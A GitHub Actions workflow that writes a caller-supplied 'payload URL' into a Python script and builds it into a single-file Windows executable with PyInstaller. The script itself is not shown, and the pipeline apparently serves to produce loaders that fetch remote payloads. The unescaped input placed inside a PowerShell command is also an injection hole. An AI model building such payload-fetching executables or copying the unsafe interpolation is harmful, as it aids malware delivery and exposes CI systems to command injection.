name: Build and Update Static Code

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest  # Running on Windows, as you need a Windows EXE

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Set up Python
      uses: actions/setup-python@v4
      with:
        python-version: '3.x'

    - name: Install dependencies
      run: |
        pip install pyinstaller psutil

    - name: Update URL in static_code.py
      run: |
        echo "Updating the payload URL dynamically..."
        powershell -Command "
          $url = '${{ github.event.inputs.payload_url }}'
          (Get-Content static_code.py) -replace '\"https://example.com/payload\"', '\"$url\"' | Set-Content static_code.py
        "
        echo "[INFO] URL updated in static_code.py."

    - name: Build executable
      run: |
        echo "Building executable with PyInstaller..."
        pyinstaller --onefile static_code.py

    - name: Debug: List dist directory
      run: |
        echo "[INFO] Checking contents of the dist directory..."
        dir dist

    - name: Upload executable
      uses: actions/upload-artifact@v4
      with:
        name: static_code_exe
        path: dist/static_code.exe  # Windows .exe file will be created here
